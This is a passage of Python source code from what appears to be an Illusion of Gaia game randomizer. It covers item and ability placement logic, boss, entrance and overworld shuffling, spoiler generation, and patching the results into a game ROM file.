self.logic[40][0] = 2 # Roast
# Remove travel items from pool
self.item_pool[10][0] = 0 # Large Roast
self.item_pool[13][0] = 0 # Memory Melody
self.item_pool[24][0] = 0 # Will
self.item_pool[25][0] = 0 # Teapot
self.item_pool[37][0] = 0 # Lola's Letter
self.item_pool[6][0] += 4 # Herbs
self.item_pool[0][0] += 1 # Nothing
# Chaos mode -- MAY NOT NEED THIS ANYMORE
# if self.logic_mode == "Chaos":
# # Add "Inaccessible" node to graph
# self.graph[INACCESSIBLE] = [False, [], 0, [0,0,0,b"\x00"], 0, "Inaccessible", [], False, [], [], [], [], [], [], [], []]
#
# # Towns can have Freedan abilities
# for x in self.item_locations:
# if self.item_locations[x][4] == [64, 65, 66]:
# self.item_locations[x][4].clear()
#
# Several locked Dark Spaces can have abilities
# ds_unlock = [74, 94, 124, 142]
#
# if 1 not in self.dungeons_req: # First DS in Inca
# ds_unlock.append(29)
# if self.kara != 1: # DS in Underground Tunnel
# ds_unlock.append(19)
# if self.kara != 5: # DS in Ankor Wat garden
# ds_unlock.append(122)
#
# for x in ds_unlock:
# self.item_locations[x][2] = False
# Red Jewel Hunts change the graph
if self.goal == "Red Jewel Hunt":
self.logic[24][2] = 492
self.logic[25][2] = 492
self.logic[26][2] = 492
self.logic[27][2] = 492
del self.logic[406]
del self.logic[407]
# Change graph logic depending on Kara's location
if self.kara == 1:
self.unrestrict_edge(400)
self.graph[49][6].append(20)
elif self.kara == 2:
self.unrestrict_edge(401)
self.graph[150][6].append(20)
# Change "Sam" to "Samlet"
self.location_text[45] = b"\x63\x80\x8c\x8b\x84\xa4"
elif self.kara == 3:
self.unrestrict_edge(402)
self.graph[270][6].append(20)
elif self.kara == 4:
self.unrestrict_edge(403)
self.graph[345][6].append(20)
elif self.kara == 5:
self.unrestrict_edge(404)
self.graph[391][6].append(20)
# Change logic based on which dungeons are required
for x in self.statues:
self.logic[406][4][x][1] = 1
# Change item pool for "player choice" statue requirement variant
if self.statue_req == StatueReq.PLAYER_CHOICE.value:
self.item_pool[100][0] = 0
self.item_pool[101][0] = 0
self.item_pool[102][0] = 0
self.item_pool[103][0] = 0
self.item_pool[104][0] = 0
self.item_pool[105][0] = 0
self.item_pool[106][0] = 6
# Incorporate item locations and logic edges into world graph
for x in self.item_locations:
self.graph[self.item_locations[x][0]][11].append(x)
for y in self.logic:
if self.logic[y][0] != -1:
self.graph[self.logic[y][1]][12].append(y)
self.graph[self.logic[y][2]][13].append(y)
# Random start location
if self.start_mode != "South Cape":
self.start_loc = self.random_start()
if print_log:
print("Start location:",self.item_locations[self.start_loc][9])
if self.start_loc == 19: # Open Lily's door when starting in Underground Tunnel
self.logic[62][0] = 2
# elif self.start_loc == 30: # Inca ramp can hardlock you -- NEW FIX MAKES THIS OBSELETE
# self.graph[83][1].append(82)
elif self.start_loc == 47: # Diamond Mine behind fences
self.graph[131][1].append(130)
if self.start_mode != "South Cape" or self.entrance_shuffle != "None":
self.graph[0][1].remove(22)
self.graph[0][1].append(self.item_locations[self.start_loc][0])
# TEMP - grant Psycho Dash at start for fluteless seeds
if self.fluteless:
self.fill_item(61,self.start_loc,False,True,print_log)
# Boss Shuffle
if "Boss Shuffle" in self.variant:
boss_entrance_idx = [1,4,7,10,13,16,19]
boss_exit_idx = [3,6,9,12,15,18,21]
dungeon = 0
if print_log:
print("Boss order: ",self.boss_order)
while dungeon < 7:
boss = self.boss_order[dungeon]
entrance_old = boss_entrance_idx[dungeon]
entrance_new = boss_entrance_idx[boss-1]
exit_old = boss_exit_idx[boss-1]
exit_new = boss_exit_idx[dungeon]
self.link_exits(entrance_old,entrance_new,print_log)
if self.exits[exit_old][5] or exit_old in self.exits_detailed:
self.link_exits(exit_old,exit_new,print_log)
dungeon += 1
# Overworld shuffle
if "Overworld Shuffle" in self.variant:
if not self.shuffle_overworld(print_log):
if print_log:
print("ERROR: Overworld shuffle failed")
return False
# Shuffle exits
if self.entrance_shuffle != "None":
if not self.shuffle_exits(print_log):
if print_log:
print("ERROR: Entrance rando failed")
return False
self.reset_progress(True)
#self.initialize_ds()
self.update_graph(True,True,True)
# Initialize Dark Space information
if self.logic_mode == "Completable":
if not self.lock_dark_spaces(print_log):
if print_log:
print("ERROR: Could not lock Dark Spaces")
return False
return True
# Update item placement logic after abilities are placed
def check_logic(self,location=0):
abilities = [61, 62, 63, 64, 65, 66]
inaccessible_ls = []
# Check for abilities in critical Dark Spaces
if self.item_locations[19][3] in abilities: # Underground Tunnel
inaccessible_ls += [17, 18]
self.restrict_edge(63)
if self.item_locations[29][3] in abilities: # Inca Ruins
inaccessible_ls += [26, 27, 30, 31, 32]
self.restrict_edge(94)
if (self.item_locations[46][3] in abilities and # Diamond Mine
self.item_locations[47][3] in abilities and
self.item_locations[48][3] in abilities):
self.restrict_edge(118)
if (self.item_locations[58][3] in abilities and # Sky Garden
self.item_locations[59][3] in abilities and
self.item_locations[60][3] in abilities):
self.restrict_edge(131)
self.restrict_edge(132)
self.restrict_edge(144)
self.restrict_edge(147)
self.restrict_edge(148)
self.restrict_edge(149)
self.restrict_edge(150)
self.restrict_edge(151)
if self.item_locations[94][3] in abilities: # Great Wall
self.graph[700] = [False, [], 0, [3,15,0,b"\x00"], 0, "Great Wall - Behind Spin", [], False, [], [], [], [], [], [], [], []]
self.logic[700] = [0, 296, 700, False, [[63, 1]]]
self.item_locations[93][0] = 700
self.logic[222][3] = True
if self.item_locations[93][3] in abilities:
inaccessible_ls += [95]
self.restrict_edge(223)
self.restrict_edge(224)
if self.item_locations[122][3] in abilities: # Ankor Wat
inaccessible_ls += [117, 118, 119, 120, 121]
self.restrict_edge(267)
self.restrict_edge(268)
self.restrict_edge(269)
self.restrict_edge(270)
self.restrict_edge(271)
self.restrict_edge(272)
if self.item_locations[142][3] in abilities: # Pyramid
inaccessible_ls += [133,134,136,139,140]
self.restrict_edge(300)
self.restrict_edge(301)
self.restrict_edge(302)
self.restrict_edge(303)
self.restrict_edge(304)
self.restrict_edge(306)
self.restrict_edge(307)
self.restrict_edge(313)
# Change graph node for inaccessible_ls locations
for x in inaccessible_ls:
if x in self.graph[self.item_locations[x][0]][11]:
self.graph[self.item_locations[x][0]][11].remove(x)
self.item_locations[x][0] = INACCESSIBLE
# Simulate inventory
def get_inventory(self,start_items=[],item_destinations=[],new_nodes=[]):
if not start_items:
start_items = self.items_collected[:]
if not item_destinations:
item_destinations = self.item_destinations[:]
inventory_temp = []
for item in start_items:
if self.item_pool[item][4]:
inventory_temp.append(item)
# negative_inventory = []
# for node in self.graph:
# if self.is_accessible(node) or node in new_nodes:
# negative_inventory += self.graph[node][6]
inventory = []
while inventory_temp:
item = inventory_temp.pop(0)
if item in item_destinations:
item_destinations.remove(item)
else:
inventory.append(item)
return inventory
# Return list of accessible nodes
def list_accessible_nodes(self):
accessible = []
for x in self.graph:
if self.is_accessible(x):
accessible.append(x)
return accessible
def print_accessible_nodes(self):
print("Accessible nodes:")
for x in self.graph:
if self.is_accessible(x):
print("",self.graph[x][5])
def print_inaccessible_nodes(self):
print("Inccessible nodes:")
for x in self.graph:
if not self.is_accessible(x):
print("",self.graph[x][5])
# Takes a random seed and builds out a randomized world
def randomize(self, seed_adj=0, print_log=False):
random.seed(self.seed + seed_adj)
if self.race_mode:
for i in range(random.randint(100, 1000)):
_ = random.randint(0, 10000)
if self.race_mode:
for i in range(random.randint(100, 1000)):
_ = random.randint(0,10000)
if not self.initialize(print_log):
if print_log:
print("ERROR: Could not initialize world")
return False
if print_log:
print("Initialization complete")
# Initialize and shuffle location list
item_locations = self.list_item_locations()
random.shuffle(item_locations)
# Fill the Mystic Statues and room-clear rewards
self.fill_statues()
self.map_rewards()
# Forward fill progression items with Monte Carlo method
# Continue to place progression items until goal is reached
done = False
goal = False
cycle = 0
place_abilities = True
self.items_collected = self.list_item_pool(1) # Assume all items for ability placement
if print_log:
print("Beginning ability placement...")
while not done:
cycle += 1
if print_log:
print(" Cycle",cycle)
if cycle > MAX_CYCLES:
if print_log:
print("ERROR: Max cycles exceeded")
return False
self.traverse()
if place_abilities:
to_place = self.list_item_pool(2)
if not to_place:
done = True
else:
random.shuffle(to_place)
progress = False
while not progress and to_place:
ability = to_place.pop(0)
progress = self.forward_fill([ability],item_locations,False,self.logic_mode == "Chaos",print_log)
if progress:
self.check_logic()
else:
if print_log:
print("ERROR: Could not place any abilities")
return False
if done:
place_abilities = False
done = False
if print_log:
print(" Finished placing abilities")
print("Beginning item placement...")
# Randomly place non-progression items
self.traverse()
non_prog_items = self.list_item_pool(0, [], 2) + self.list_item_pool(0, [], 3)
for item in non_prog_items:
if item in self.items_collected:
self.items_collected.remove(item)
self.forward_fill(non_prog_items, item_locations, False, self.logic_mode == "Chaos", print_log)
# List and shuffle remaining key items
item_list = self.list_item_pool()
#random.shuffle(item_list)
# Reset graph, prepare for item placement
self.reset_progress(True)
self.update_graph()
else:
if len(self.get_inventory()) > MAX_INVENTORY:
goal = False
if print_log:
print("WARNING: Inventory capacity exceeded")
else:
goal = self.is_accessible(492)
# Get list of new progression options
#if print_log:
# print("Open edges:",self.open_edges)
# print("Open locations:",self.open_locations)
progression_result = self.progression_list()
if print_log:
print("Progression options: {")
print(" ",progression_result[0])
print(" ",progression_result[1])
print(" ",progression_result[2],"}")
progression_list = progression_result[0]
is_progression = (progression_result != [[],[],[]])
done = goal and (self.logic_mode != "Completable" or not is_progression)
if not done:
if not is_progression:
if print_log:
print("ERROR: Couldn't progress any further")
self.print_graph()
return False
progress = False
key = random.uniform(0,100)
while not progress and progression_list:
progression_mc = self.monte_carlo(progression_list)
idx = 0
for x in progression_mc:
if key <= x[0] and not idx:
idx = x[1]
items = progression_list.pop(idx)
if self.forward_fill(items, item_locations, False, self.logic_mode == "Chaos", print_log):
progress = True
# if print_log:
# print(" Placed progression items successfully")
if not progress:
if print_log:
print(" No suitable progression found, attempting to make room...")
if not self.make_room(progression_result,print_log):
if print_log:
print("ERROR: Could not find progression")
self.print_graph()
return False
if print_log:
print("Placing junk items...")
junk_items = self.list_item_pool()
#random.shuffle(junk_items)
self.random_fill(junk_items, item_locations, False, print_log)
if print_log:
print("Item placement complete, beginning final traversal...")
self.reset_progress(True)
self.update_graph()
self.traverse([],False,print_log)
if print_log:
locked_ds = [19,29,122]
for x in locked_ds:
if self.item_locations[x][3] in [61, 62, 63, 64, 65, 66]:
print("WARNING:",self.item_locations[x][9],"has an ability")
if self.logic_mode == "Completable" and self.goal != "Red Jewel Hunt":
completed = True
for node in self.graph:
if not self.graph[node][0] and node <600:
if print_log:
print("Can't reach ",self.graph[node][5])
completed = False
else:
completed = self.graph[492][0]
if not completed:
if print_log:
self.print_graph()
print("ERROR: Seed failed, trying again...")
print("")
return False
if print_log:
print("Writing hints...")
placement_log = self.placement_log[:]
random.shuffle(placement_log)
self.in_game_spoilers(placement_log)
if print_log:
print("Randomization complete!")
return True
def print_graph(self):
print("Open edges:",self.open_edges)
print("Open locations:",self.open_locations)
for node in self.graph:
print(node,self.graph[node])
# Prepares dataset to give in-game spoilers
def in_game_spoilers(self, placement_log=[]):
for x in placement_log:
item = x[0]
location = x[1]
if location not in self.free_locations and location in self.location_text:
if item in self.required_items or item in self.good_items or location in self.trolly_locations:
spoiler_str = b"\xd3" + self.location_text[location] + b"\xac\x87\x80\xa3\xcb"
spoiler_str += self.item_text_short[item] + b"\xc0"
# No in-game spoilers in Expert mode
if self.difficulty >= 3:
spoiler_str = b"\xd3\x8d\x88\x82\x84\xac\xa4\xa2\xa9\xac\x83\x8e\x83\x8e\x8d\x86\x8e\x4f\xc0"
self.spoilers.append(spoiler_str)
# print item, location
# Prints item and ability locations
def generate_spoiler(self, version=""):
if self.kara == 1:
kara_txt = "Edward's Castle"
elif self.kara == 2:
kara_txt = "Diamond Mine"
elif self.kara == 3:
kara_txt = "Angel Dungeon"
elif self.kara == 4:
kara_txt = "Mt. Kress"
elif self.kara == 5:
kara_txt = "Ankor Wat"
if self.difficulty == 0:
difficulty_txt = "Easy"
elif self.difficulty == 1:
difficulty_txt = "Normal"
elif self.difficulty == 2:
difficulty_txt = "Hard"
elif self.difficulty == 3:
difficulty_txt = "Extreme"
spoiler = dict()
spoiler["version"] = version
spoiler["seed"] = str(self.seed)
spoiler["date"] = str(datetime.utcfromtimestamp(time.time()))
spoiler["goal"] = str(self.goal)
spoiler["entrance_shuffle"] = str(self.entrance_shuffle)
spoiler["start_location"] = self.item_locations[self.start_loc][9].strip()
spoiler["logic"] = str(self.logic_mode)
spoiler["difficulty"] = str(difficulty_txt)
if self.statue_req == StatueReq.PLAYER_CHOICE.value:
spoiler["statues_required"] = self.statues_required
else:
spoiler["statues_required"] = self.statues
spoiler["boss_order"] = self.boss_order
spoiler["kara_location"] = kara_txt
spoiler["jeweler_amounts"] = self.gem
spoiler["inca_tiles"] = self.incatile
spoiler["hieroglyph_order"] = self.hieroglyphs
items = []
for x in self.item_locations:
if x < 500:
item = self.item_locations[x][3]
location_name = self.item_locations[x][9].strip()
item_name = self.item_pool[item][3]
items.append({"location": location_name, "name": item_name})
spoiler["items"] = items
if "Overworld Shuffle" in self.variant:
overworld_links = []
for continent_id, continent_data in self.overworld_menus.items():
continent_name = continent_data[7]
region_name = self.overworld_menus[continent_data[0]][8]
overworld_links.append({"region": region_name, "continent": continent_name})
spoiler["overworld_entrances"] = overworld_links
if self.entrance_shuffle != "None":
exit_links = []
for exit in self.exits:
exit_name = self.exits[exit][10]
linked_exit = self.exits[exit][1]
if not linked_exit:
exit_linked_name = exit_name
else:
exit_linked_name = self.exits[linked_exit][10]
exit_links.append({"entrance": exit_name, "exit": exit_linked_name})
spoiler["exit_links"] = exit_links
self.spoiler = spoiler
#self.complete_graph_visualization()
def complete_graph_visualization(self,print_log=False):
self.graph_viz = graphviz.Digraph(graph_attr=[('concentrate','true'),
('rankdir', 'TB')], strict=True)
graph = self.graph_viz
areas = dict()
area_names = ["Overworld",
"South Cape",
"Edward's Castle",
"Itory Village",
"Moon Tribe",
"Inca Ruins",
"Diamond Coast",
"Freejia",
"Diamond Mine",
"Neil's Cottage",
"Nazca Plain",
"Seaside Palace",
"Mu",
"Angel Village",
"Watermia",
"Great Wall",
"Euro",
"Mt. Kress",
"Native's Village",
"Ankor Wat",
"Dao",
"Pyramid",
"Babel",
"Jeweler's Mansion"]
graph.attr('node', shape='box')
for area_id in range(len(area_names)):
areas[area_id] = list()
for area_id in range(1,len(area_names)):
node_name = f"area_{area_id}"
node_content = area_names[area_id]
#areas[0].append((node_name, node_content))
for region_id, region_data in self.graph.items():
area = region_data[3][1]
node_name = f"region_{region_id}"
node_content = region_data[5]
areas[area].append((node_name, node_content))
for area_id, area_nodes in areas.items():
for node_id, node_content in area_nodes:
graph.node(node_id, node_content)
#with graph.subgraph(name=f"cluster_{area_id}") as c:
# c.attr(label=area_names[area_id],
# color="black")
# for node_id, node_content in area_nodes:
# if area_id != 0:
# c.node(node_id, node_content)
# else:
# graph.node(node_id,node_content)
for region_id, region_data in self.graph.items():
start_area = region_data[3][1]
node_name = f"region_{region_id}"
area_name = f"area_{start_area}"
for accessible_region_id in region_data[1]:
end_area = self.graph[accessible_region_id][3][1]
end_area_name = f"area_{end_area}"
accessible_node_name = f"region_{accessible_region_id}"
graph.edge(node_name, accessible_node_name)
#if start_area != 0 and end_area != 0:
# if start_area != end_area:
# graph.edge(area_name, end_area_name)
# else:
# graph.edge(node_name, accessible_node_name)
#elif start_area != 0:
# graph.edge(area_name, accessible_node_name)
#elif end_area != 0:
# graph.edge(node_name, end_area_name)
#else:
# graph.edge(node_name, accessible_node_name)
for _, logic_data in self.logic.items():
needed_items = logic_data[2]
enough_items = True
for item_id, quantity in needed_items:
existing_quantity = 0
if item_id not in self.item_pool:
if print_log:
print("Missing info about item:", item_id)
else:
existing_quantity = self.item_pool[item_id][0]
for _, location_data in self.item_locations.items():
if location_data[2] and item_id == location_data[3]:
existing_quantity += 1
if existing_quantity < quantity:
enough_items = False
break
if not enough_items:
continue
start_name = f"region_{logic_data[0]}"
dest_name = f"region_{logic_data[1]}"
start_area = self.graph[logic_data[0]][3][1]
end_area = self.graph[logic_data[1]][3][1]
area_name = f"area_{start_area}"
end_area_name = f"area_{end_area}"
graph.edge(start_name, dest_name)
#if start_area != 0 and end_area != 0:
# if start_area != end_area:
# graph.edge(area_name, end_area_name)
# else:
# graph.edge(start_name, dest_name)
#elif start_area != 0:
# graph.edge(area_name, dest_name)
#elif end_area != 0:
# graph.edge(start_name, end_area_name)
#else:
# graph.edge(start_name, dest_name)
per_region_item_node = dict()
item_location_color_map = {
1: "yellow",
2: "blue",
3: "green",
4: "white"
}
graph.attr('node', shape='plaintext')
for itemloc_id, itemloc_data in self.item_locations.items():
# Add Item_location_nodes
location_region = itemloc_data[0]
region_node_name = f"region_{location_region}"
region_item_node_name = f"region_itemnode_{location_region}"
if (itemloc_data[1] != 2 or itemloc_data[3] != 0) and itemloc_data[1] != 4:
if region_item_node_name not in per_region_item_node:
per_region_item_node[region_item_node_name] = []
graph.edge(region_node_name, f"{region_item_node_name}")
per_region_item_node[region_item_node_name].append((itemloc_id))
for region_item_node_name, locations_id in per_region_item_node.items():
node_content = "<<table border='0' cellborder='1' cellspacing='0'>"
for itemloc_id in locations_id:
itemloc_data = self.item_locations[itemloc_id]
item_name = self.item_pool[itemloc_data[3]][3]
location_name = itemloc_data[9]
if ":" in location_name:
location_name = ":".join(location_name.split(':')[1:])
location_type = itemloc_data[1]
node_content += f"""<tr>
<td ALIGN='left' bgcolor='{item_location_color_map[location_type]}'>{location_name.strip()}</td>
<td align='center'>{item_name}</td>
</tr>"""
node_content += "</table>>"
graph.node(region_item_node_name, node_content)
def print_enemy_locations(self, filepath, offset=0):
f = open(filepath, "r+b")
rom = f.read()
for enemy in self.enemies:
print(self.enemies[enemy][3])
done = False
addr = int("c8200", 16) + offset
while not done:
addr = rom.find(self.enemies[enemy][1], addr + 1)
if addr < 0 or addr > int("ce5e4", 16) + offset:
done = True
else:
f.seek(addr)
# f.write(b"\x55\x87\x8a\x05")
print(" ", addr, hex(addr), binascii.hexlify(f.read(4)))
f.close
# Prints item and ability locations
def print_spoiler(self):
if self.kara == 1:
kara_txt = "Edward's Castle"
elif self.kara == 2:
kara_txt = "Diamond Mine"
elif self.kara == 3:
kara_txt = "Angel Dungeon"
elif self.kara == 4:
kara_txt = "Mt. Kress"
elif self.kara == 5:
kara_txt = "Ankor Wat"
print("")
print("Seed > ", self.seed)
print("Statues Required > ", self.statues)
print("Kara Location > ", kara_txt)
print("Jeweler Reward Amounts > ", self.gem)
print("Inca Tile (column, row) > ", self.incatile)
print("Hieroglyph Order > ", self.hieroglyphs)
print("")
for x in self.item_locations:
item = self.item_locations[x][3]
location_name = self.item_locations[x][9]
item_name = self.item_pool[item][3]
print(location_name, " > ", item_name)
# Modifies game ROM to reflect the current state of the World
def write_to_rom(self, f, rom_offset=0, print_log=False):
# Room-clearing rewards
idx_tier2 = 0
idx_tier3 = 0
idx_tier4 = 0
for map in self.maps:
reward_tier = self.maps[map][2][1]
if reward_tier > 0:
reward = self.maps[map][2][0]
f.seek(int("1aade", 16) + map + rom_offset)
f.write(binascii.unhexlify(format(reward,"02x")))
# Populate player level logic
if reward_tier == 2:
f.seek(int("f4a7", 16) + 4*idx_tier2 + rom_offset)
f.write(binascii.unhexlify(format(map,"02x"))+b"\x03")
idx_tier2 += 1
elif reward_tier == 3:
f.seek(int("f4bf", 16) + 4*idx_tier3 + rom_offset)
f.write(binascii.unhexlify(format(map,"02x"))+b"\x03")
idx_tier3 += 1
elif reward_tier == 4:
f.seek(int("f4d7", 16) + 4*idx_tier4 + rom_offset)
f.write(binascii.unhexlify(format(map,"02x"))+b"\x03")
idx_tier4 += 1
#print("maps done")
# Items and abilities
for x in self.item_locations:
type = self.item_locations[x][1]
# Write items to ROM
if type == 1:
item = self.item_locations[x][3]
# print "Writing item ", item
item_addr = self.item_locations[x][5]
item_code = self.item_pool[item][2]
text1_addr = self.item_locations[x][6]
text2_addr = self.item_locations[x][7]
text3_addr = self.item_locations[x][8]
if item in self.item_text_long:
text_long = self.item_text_long[item]
else:
text_long = ""
if item in self.item_text_short:
text_short = self.item_text_short[item]
else:
text_short = ""
# Write item code to memory
if item_code and item_addr:
f.seek(int(item_addr, 16) + rom_offset)
f.write(item_code)
# Write item text, if appropriate
if text1_addr and text_long:
f.seek(int(text1_addr, 16) + rom_offset)
f.write(text_long)
# f.write(b"\xd3")
# f.write(text_short)
f.write(b"\xc9\x0a\xc0")
# Write "inventory full" item text, if appropriate
if text2_addr and text_long:
f.seek(int(text2_addr, 16) + rom_offset)
# f.write(b"\xd3")
# f.write(text_short)
f.write(text_long)
f.write(b"\xcb\x45\x65\x4b\x4b\x4f\xc9\x0a\xc0") # Just says "FULL!"
# Write jeweler inventory text, if apprpriate
if text3_addr and text_short:
f.seek(int(text3_addr, 16) + rom_offset)
f.write(text_short)
# Write abilities to ROM
elif type == 2: # Check if filled
ability = self.item_locations[x][3]
ability_addr = self.item_locations[x][5]
map = self.item_locations[x][8]
# Change Dark Space type in event table
if ability in [61, 62, 63, 64, 65, 66]:
f.seek(int(ability_addr, 16) + rom_offset)
f.write(b"\x05")
# Update ability text table
if ability == 61: # Psycho Dash
# f.seek(int("8eb5a",16)+2*i+rom_offset)
f.seek(int("8eb5a", 16) + rom_offset)
f.write(map)
if ability == 62: # Psycho Slide
f.seek(int("8eb5c", 16) + rom_offset)
f.write(map)
if ability == 63: # Spin Dash
f.seek(int("8eb5e", 16) + rom_offset)
f.write(map)
if ability == 64: # Dark Friar
f.seek(int("8eb60", 16) + rom_offset)
f.write(map)
if ability == 65: # Aura Barrier
f.seek(int("8eb62", 16) + rom_offset)
f.write(map)
if ability == 66: # Earthquaker
f.seek(int("8eb64", 16) + rom_offset)
f.write(map)
#print("items/abilities done")
# Special code for 2-item event in Dao
item1 = self.item_locations[125][3]
item2 = self.item_locations[126][3]
f.seek(int("8fde0", 16) + rom_offset)
f.write(b"\xd3" + self.item_text_short[item1] + b"\xcb")
f.write(self.item_text_short[item2] + b"\xc9\x0a\xcf\xce")
# Write in-game spoilers
i = 0
for addr in self.spoiler_addresses:
f.seek(int(self.spoiler_addresses[addr], 16) + rom_offset)
if i < len(self.spoilers):
f.write(self.spoilers[i])
i += 1
#print("spoilers done")
# Enemizer
if self.enemizer != "None":
# "Fix" Ankor Wat Gorgons so they don't fall from the ceiling
f.seek(int("bb825", 16) + rom_offset)
f.write(b"\x00\x00\x00\x02\x27\x0F\x02\xC1\x4C\xA0\xB8\x6B")
# Run enemizer
self.enemize(f, rom_offset)
# self.parse_maps(f,rom_offset)
# Random start location
if self.start_mode != "South Cape" or self.entrance_shuffle != "None":
# print self.start_loc
map_str = self.item_locations[self.start_loc][8] + self.item_locations[self.start_loc][7]
# Change game start location
f.seek(int("be517", 16) + rom_offset)
f.write(map_str)
# Change Dark Space warp location
f.seek(int("8dbea", 16) + rom_offset)
f.write(map_str)
# Change Dark Space warp text
map_name = self.location_text[self.start_loc]
f.seek(int("8de1f", 16) + rom_offset)
f.write(map_name + b"\x0D\xCB\xAC\x4D\x8E\xCB\xAC\x69\x84\xA3\xCA")
#print("random start done")
# Overworld shuffle
if "Overworld Shuffle" in self.variant:
ow_patch_data = []
for entry in self.overworld_menus:
# Prepare ROM edits
new_entry = self.overworld_menus[entry][0]
f.seek(int(self.overworld_menus[new_entry][4], 16) + rom_offset)
ow_patch_data.append([self.overworld_menus[entry][4], f.read(8)])
f.seek(int(self.overworld_menus[new_entry][6], 16) + rom_offset)
ow_patch_data.append([self.overworld_menus[entry][6], f.read(11)])
ow_patch_data.append([self.overworld_menus[new_entry][5], self.overworld_menus[entry][1]])
for x in ow_patch_data:
f.seek(int(x[0], 16) + rom_offset)
f.write(x[1])
#print("overworld shuffle done")
# Entrance shuffle
er_patch_data = []
for exit in self.exits:
#self.exits[exit][0] = exit #TESTING ONLY
# Prepare ROM edits
new_exit = self.exits[exit][1]
if new_exit and self.exits[exit][5]: # and exit != new_exit:
try:
if self.exits[new_exit][6]:
new_data = self.exits[new_exit][6]
else:
f.seek(int(self.exits[new_exit][5], 16) + rom_offset)
new_data = f.read(8)
er_patch_data.append([self.exits[exit][5], new_data])
except:
if print_log:
print("ERROR: exit data invalid",exit,new_exit)
for exit in self.exits_detailed:
new_exit = self.exits[exit][1]
if new_exit:
map_str = self.exits[new_exit][6]
map_id = map_str[0:1]
xcoord = int.to_bytes(int.from_bytes(map_str[1:3], byteorder="little") // 16, 2, byteorder='little')
ycoord = int.to_bytes(int.from_bytes(map_str[3:5], byteorder="little") // 16, 2, byteorder='little')
facedir = map_str[5:6]
camera = map_str[6:8]
# print(map_id,xcoord,ycoord,facedir,camera)
er_patch_data.append([self.exits_detailed[exit][0], map_id])
er_patch_data.append([self.exits_detailed[exit][1], xcoord])
er_patch_data.append([self.exits_detailed[exit][2], ycoord])
if self.exits_detailed[exit][3] != "":
er_patch_data.append([self.exits_detailed[exit][3], facedir])
er_patch_data.append([self.exits_detailed[exit][4], camera])
for x in er_patch_data:
try:
f.seek(int(x[0], 16) + rom_offset)
f.write(x[1])
except:
if print_log:
print("ERROR: Not a valid address", x)
#print("entrance shuffle done")
# Check for additional switches that need to be set
switch_str = []
if self.start_loc == 19: # Open Lily's door when starting in Underground Tunnel
switch_str.append(b"\x02\xcd\x13\x01")
# elif self.start_loc == 30: # Inca ramp can hardlock you -- NEW FIX MAKES THIS OBSELETE
# switch_str.append(b"\x02\xcd\x0c\x01")
elif self.start_loc == 47: # Diamond Mine behind fences
switch_str.append(b"\x02\xcd\x34\x01\x02\xcd\x35\x01\x02\xcd\x36\x01")
if "Open Mode" in self.variant:
switch_str.append(b"\x02\xcc\x11\x02\xcc\x14\x02\xcc\x1f\x02\xcc\x2a\x02\xcc\x41")
if self.enemizer != "None" and self.enemizer != "Limited":
switch_str.append(b"\x02\xcc\xa0\x02\xcc\xa1")
f.seek(int("1ffb0", 16) + rom_offset)
for x in switch_str:
f.write(x)
f.write(b"\x6b")
#print("switches done")
# Swapped exits
# for exit in self.exits:
# if self.exits[exit][1] > 0:
# to_exit = self.exits[exit][1]
# map_str = self.exits[to_exit][9]
# if self.exits[exit][8] != "":
# f.seek(int(self.exits[exit][8], 16) + rom_offset)
# f.write(map_str)
# else:
# map_id = map_str[0:1]
# xcoord = int.to_bytes(int.from_bytes(map_str[1:3], byteorder="little") // 16, 2, byteorder='little')
# ycoord = int.to_bytes(int.from_bytes(map_str[3:5], byteorder="little") // 16, 2, byteorder='little')
# facedir = map_str[5:6]
# camera = map_str[6:8]
# # print(map_id,xcoord,ycoord,facedir,camera)
#
# f.seek(int(self.exits_detailed[exit][0], 16) + rom_offset)
# f.write(map_id)
# f.seek(int(self.exits_detailed[exit][1], 16) + rom_offset)
# f.write(xcoord)
# f.seek(int(self.exits_detailed[exit][2], 16) + rom_offset)
# f.write(ycoord)
# if self.exits_detailed[exit][3] != "":
# f.seek(int(self.exits_detailed[exit][3], 16) + rom_offset)
# f.write(facedir)
# f.seek(int(self.exits_detailed[exit][4], 16) + rom_offset)
# f.write(camera)
# print "ROM successfully created"
# Print parsed list of map headers
def parse_maps(self, f, rom_offset=0):
f.seek(int("d8000", 16) + rom_offset)
header_lengths = {
b"\x02": 1,
b"\x03": 7,
b"\x04": 6,
b"\x05": 7,
b"\x06": 4,
b"\x0e": 3,
b"\x10": 6,
b"\x11": 5,
b"\x13": 2,
b"\x14": 1,
b"\x15": 1,
b"\x17": 5
}
done = False
addr = 0
map_dataset = {}
anchor_dataset = {}
while not done:
map_id = f.read(2)
print(binascii.hexlify(map_id))
map_headers = []
anchor_headers = []
map_done = False
anchor = False
while not map_done:
map_header = f.read(1)
if map_header == b"\x14":
anchor = True
anchor_id = f.read(1)
map_header += anchor_id
map_headers.append(map_header)
print(binascii.hexlify(map_header))
elif map_header == b"\x00":
map_done = True
print(binascii.hexlify(map_header))
print("")
else:
header_len = header_lengths[map_header]
map_header += f.read(header_len)
map_headers.append(map_header)
print(binascii.hexlify(map_header))
if anchor:
anchor_headers.append(map_header)
anchor_dataset[map_id] = map_headers
if anchor_headers:
anchor_dataset[anchor_id] = anchor_headers
if f.tell() >= int("daffe", 16) + rom_offset:
done = True
# print map_headers
print(anchor_headers)
# Pick random start location
def random_start(self,print_log=False):
locations = []
for loc in self.item_locations:
if (self.start_mode == "Forced Unsafe" and self.item_locations[loc][6] == "Unsafe") or (
self.start_mode != "Forced Unsafe" and self.item_locations[loc][6] == "Safe") or (
self.item_locations[loc][6] == self.start_mode):
locations.append(loc)
if not locations:
if print_log:
print("ERROR: Something is fishy with start locations")
return -1
else:
# print locations
# return 93 # TESTING!
return locations[random.randint(0, len(locations) - 1)]
# Shuffle travel destinations
def shuffle_overworld(self,print_log=False):
new_continents = [[],[],[],[],[]]
# Ensure each continent has at least one travel location
destination_list = [1,6,12,14,16,18]
random.shuffle(destination_list)
for continent in new_continents:
continent.append(destination_list.pop(0))
# Randomly assign the rest of the locations
destination_list += [2,3,4,5,7,8,9,10,11,13,15,17,19]
random.shuffle(destination_list)
new_continents[0] += destination_list[:4]
new_continents[1] += destination_list[4:8]
new_continents[2] += destination_list[8:10]
new_continents[3] += destination_list[10:13]
new_continents[4] += destination_list[-1:]
for continent in new_continents:
random.shuffle(continent)
self.overworld_menus[1][0] = new_continents[0][0]
self.overworld_menus[2][0] = new_continents[0][1]
self.overworld_menus[3][0] = new_continents[0][2]
self.overworld_menus[4][0] = new_continents[0][3]
self.overworld_menus[5][0] = new_continents[0][4]
self.overworld_menus[6][0] = new_continents[1][0]
self.overworld_menus[7][0] = new_continents[1][1]
self.overworld_menus[8][0] = new_continents[1][2]
